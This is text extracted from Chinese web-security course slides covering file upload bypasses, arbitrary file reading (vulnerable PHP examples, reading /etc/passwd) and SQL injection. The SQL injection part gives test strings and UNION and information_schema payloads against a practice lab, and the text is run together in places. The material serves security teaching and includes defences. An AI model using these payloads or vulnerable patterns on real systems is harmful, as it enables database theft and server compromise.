利用1.客户端javascript检测绕过2.服务端MIME类型检测绕过3.服务端getimagesize检测绕过4.up-lab文件上传实验本课件是可编辑的正常PPT课件2.文件上传漏洞利与防御2.2文件上传漏洞防御（1）不要在前端使用js实施上传限制策略（2）通过服务端对文件上传文件进行限制

（2.1）进行多条件组合检查：比如文件大小，路径，扩展名，文件类型，文件完整性（2.2）对上传的文件在服务器上存储时进行重命名（制定合理的命名规则）（2.3）对服务端上传的目录进行权限控制（比如只读），限制执行权限带来的危害。本课件是可编辑的正常PPT课件小结1.文件上传漏洞的概念、原因、危害、测试流程2.文件上传漏洞的利用与防御措施本课件是可编辑的正常PPT课件作业1.客户端javascript检测绕过2.服务端MIME类型检测绕过3.服务端getimagesize检测绕过4.up-lab实验选做本课件是可编辑的正常PPT课件项目7：文件下载漏洞利用与防护

本课件是可编辑的正常PPT课件项目目标知识目标：1.了解任意文件读取的概念，利用条件，危害2.掌握任意文件读取漏洞的利用3.掌握任意文件读取漏洞加固能力目标：1.能够利用任意文件读取漏洞并对该漏洞进行防御情感目标：1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件1.任意文件读取漏洞概述1.1任意文件读取漏洞一些网站由于业务需求，往往需要提供文件查看或文件下载功能，但若对用户查看或下载的文件不做限制，则恶意用户就能够查看或下载任意敏感文件，这就是任意文件读取漏洞。本课件是可编辑的正常PPT课件1.任意文件读取漏洞概述1.2漏洞危害（1）下载服务器任意文件，如脚本代码、服务及系统配置文件等（2）可用得到的代码进一步代码审计，得到更多可利用漏洞本课件是可编辑的正常PPT课件1.任意文件读取漏洞概述1.3漏洞利用条件（1）存在读文件的函数（2）读取文件的路径用户可控且未校验或校验不严（3）输出了文件内容本课件是可编辑的正常PPT课件1.任意文件读取漏洞概述1.4PHP任意读取文件函数file_get_contents()fopen()readfile

fread

fgets

fgetss

fpassthru

parse_ini_file

漏洞示例代码<?php

$filename

=

$_GET['file'];

if(isset($filename)){

readfile($filename);

}?>漏洞示例代码<?php$filename=$_GET['filename'];echofile_get_contents($filename);?>漏洞示例代码<?php$filename="test.txt";$fp=fopen($filename,"r")ordie(“noopen!");$data=fread($fp,filesize($filename));fclose($fp);echo$data;?>本课件是可编辑的正常PPT课件2任意文件读取漏洞利用与加固2.1漏洞利用1.利用任意文件读取漏洞下载/etc/passwd敏感文件本课件是可编辑的正常PPT课件2任意文件读取漏洞利用与加固2.2漏洞加固1.对传入的文件名进行严格的过滤和限定2.对文件下载的目录进行严格的限定本课件是可编辑的正常PPT课件小结1.任意文件读取的原理2.任意文件读取漏洞的利用与加固本课件是可编辑的正常PPT课件作业1.读取敏感文件2.任意文件下载本课件是可编辑的正常PPT课件项目8：SQL注入漏洞利用与防护

本课件是可编辑的正常PPT课件项目目标知识目标：1.了解SQL注入漏洞的基本概念、危害，分类2.理解SQL注入漏洞的测试流程、测试字符串3.掌握数据库的基本操作4.掌握手工注入&工具注入5.掌握SQL注入漏洞的利用与加固能力目标：1.能利用SQL注入漏洞获取目标靶机数据情感目标：1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件1.SQL注入漏洞概述1.1SQL注入漏洞及形成原因定义：SQL注入即是指web应用程序对用户输入数据的合法性没有判断，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。原因：SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。从而导致数据库受损（被脱裤、被删除、甚至整个服务器权限沦陷）。本课件是可编辑的正常PPT课件1.SQL注入漏洞概述1.2SQL注入漏洞及形成原因Sql注入漏洞形成原因，主要是开发人员在构建代码时，没有对输入边界进行安全考虑，导致攻击者可以通过合法的输入点提交一些精心构造的语句，从而欺骗后台数据库对其进行执行，导致数据库信息泄露。非法输入：id=1or1=1select*fromproductwhereid=1or1=1正常输入：id=1select*fromproductwhereid=1本课件是可编辑的正常PPT课件1.SQL注入漏洞概述1.3SQL注入漏洞危害（1）数据库信息泄露：数据库中存放的用户的隐私信息的泄露（2）网页篡改：通过操作数据库对特定问也进行篡改（3）网站被挂马，传播恶意软件：修改数据库一些字段的值，进行挂马攻击。…….本课件是可编辑的正常PPT课件1.SQL注入漏洞概述1.4SQL注入攻击流程第一步：注入点探测

自动方式：使用web漏洞扫描工具，自动进行注入点发现

手动方式：手工构造sql注入语句进行注入点发现第二步：信息获取

通过注入点取期望得到的数据

环境信息：数据库类型，数据库版本，操作系统版本，用户信息等

数据库信息：数据库名称，数据库表，表字段，字段内容第三步：获取权限

获取操作系统权限，通过数据库执行shell，上传木马本课件是可编辑的正常PPT课件1.SQL注入漏洞概述1.5SQL注入测试字符串or1=1--

'or1=1--

xx%’or1=1--“or1=1--)or1=1--')or1=1--")or1=1--"))or1=1--………..--可以用#替换，url提交过程中Url编码后的#为%23本课件是可编辑的正常PPT课件1.SQL注入漏洞概述$conn=mysql_connect($host,$username,$password);$query=”select*fromuserswhereuser=’admin’andpasswd=’”;$query=$query.$_GET[“passwd”]”’”;$result=mysql_query($query);#######################################################################正常的数据：passwd=admin888、passwd=test123后台所执行的语句：Select*fromuserswhereuser=’admin’andpasswd=’admin888’–登陆成功Select*fromuserswhereuser=’admin’andpasswd=’test123’–登陆失败带有恶意代码的数据：passwd=’

or1=1#此时后台执行语句为：Select*fromuserswhereuser=’admin’andpasswd=‘admin’or1=1#’–登陆成功本课件是可编辑的正常PPT课件1.SQL注入漏洞概述1.6SQL注入漏洞位置（1）登陆框（2）搜索框（3）url参数值（4）信息设置只要是后台数据库操作的地方，都有可能有注入本课件是可编辑的正常PPT课件2.数据库基础2.1数据库概念数据库：长期储存在计算机内的，有组织的，可共享的数据集合。DMBS：如何组织和存储数据库中的数据，如何有效地获取和维护这些数据。完成这个任务的程序(软件)叫数据库管理系统（DataBaseManagementSystem：DMBS）DBMSDatabase程序数据库用户请求本课件是可编辑的正常PPT课件2.数据库基础2.2常用的数据库mysql，oracle，SQLServer等2.3常用的数据库结构库->表->字段，采用结构化查询语言（SQL）select

列名称1，列名称2

from表名称deletefrom表名称where

列名称=值update

表名称

set列名称=新值where列名称=某值insertinto表名(列1，列2，……）values(值1，值2，……)本课件是可编辑的正常PPT课件2.数据库基础2.2常用的数据库mysql，oracle，SQLServer等2.3常用的数据库结构库->表->字段，采用结构化查询语言（SQL）本课件是可编辑的正常PPT课件2.数据库基础2.4常用的数据库操作登录数据库：mysql–uroot–p****显示数据库：showdatabases;使用数据库：use数据库名;显示表名称：showtables;查看表的字段：desc表名称;select

列名称1，列名称2

from表名称查询数据库：selectdatabase();

查询用户：selectuser();查询版本：selectversion()deletefrom表名称where

列名称=值update

表名称

set列名称=新值where列名称=某值insertinto表名(列1，列2，……）values(值1，值2，……)本课件是可编辑的正常PPT课件3.SQL注入漏洞分类根据注入点类型不同，分为（1）整数型user_id=$id（2）字符型user_id=’$id’

（3）搜索型textlike“%{$_GET[‘search’]}%”（4）其他类型

不管是那种类型的注入的，总而言之，就是对sql中的各种类型的输入进行闭合测试，构造合法的sql，欺骗后台的执行。只要我们猜测后台的语句是怎么来拼接的，然后去构造闭合。本课件是可编辑的正常PPT课件4.union联合查询4.1union操作符union操作符：用于合并两个或多个select语句的结果集。在mysql数据库或其他关系型数据库里面都提供了这样的一个方法。4.2用法举例selectusername，passwordfromuserwhereid=1unionselect字段1，字段2from表名注意，union内部的每个select语句必须拥有相同数量的列。mysql>selectid,usernamefrommemberunionselectpw,email,idfrommemberwhereid=2;ERROR1222(21000):TheusedSELECTstatementshaveadifferentnumberofcolumns本课件是可编辑的正常PPT课件4.union联合查询4.1union操作符union操作符：用于合并两个或多个select语句的结果集。在mysql数据库或其他关系型数据库里面都提供了这样的一个方法。4.2用法举例selectusername，passwordfromuserwhereid=1unionselect字段1，字段2from表名注意，union内部的每个select语句必须拥有相同数量的列。mysql>selectid,usernamefrommemberunionselectpw,email,idfrommemberwhereid=2;ERROR1222(21000):TheusedSELECTstatementshaveadifferentnumberofcolumns本课件是可编辑的正常PPT课件4.union联合查询思考题当我们用union联合查询的时候，我们并不知道后台的数据库里面查询了几个字段，怎么解决这个问题？采用orderby语句本课件是可编辑的正常PPT课件4.union联合查询4.3

orderby（1）orderbyn对查询的结果进行排序，按照第n列进行排序，n数字是1-9，字母是a-z。（2）orderby语句用于根据指定的列对结果集进行排序。如果指定的列不存在，数据库会报错，通过报错判断查询结果的列数，从而确定主查询的字段数。mysql>selectid,usernamefrommemberorderby2;mysql>selectid,usernamefrommemberorderby3;ERROR1054(42S22):Unknowncolumn'3'in'orderclause'本课件是可编辑的正常PPT课件4.union联合查询4.4

获取数据库基础信息Step1：用orderby猜测获取几列数据Payload：xx’order

by

5#Step2：获取数据库基础信息Payload：kobe'unionselectdatabase(),user()#本课件是可编辑的正常PPT课件5.information_schema数据库5.1information_schema数据库在mysql中，自带的information_schema这个表里面存放了大量的重要信息。如果存在注入点的话，可以直接尝试对该数据库进行访问，从而获取更多的信息。（1）SCHEMATA表：提供了当前mysql实例中所有数据库的信息。showdatabases的结果取自此表。（2）TABLES表：提供了关于数据库中表的信息（包括视图），详细表述了某个表属于哪个schema，表类型，创建时间等信息。是showtablesfromschmename的结果取自此表。（3）COLUMNS表：提供了表中的列的信息，详细表述了某张表所有列以及每个列的信息，是Showcolumnsfromschemaname.tablename的结果取自此表。本课件是可编辑的正常PPT课件5.information_schema数据库1.获取表名mysql>selectid,emailfrommemberwhereusername='kobe'unionselecttable_schema,table_namefrominformation_schema.tableswheretable_schema='pikachu’;Payload：kobe'unionselecttable_schema,table_namefrominformation_schema.tableswheretable_schema='pikachu'#2.获取列名mysql>selectid,emailfrommemberwhereusername='kobe'unionselecttable_name,column_namefrominformation_schema.columnswheretable_name='users’;Payload：kobe'unionselecttable_name,column_namefrominformation_schema.columnswheretable_name='users'#3.获取内容mysql>selectid,emailfrommemberwhereusername='kobe'unionselectusername,passwordfromusers;Pa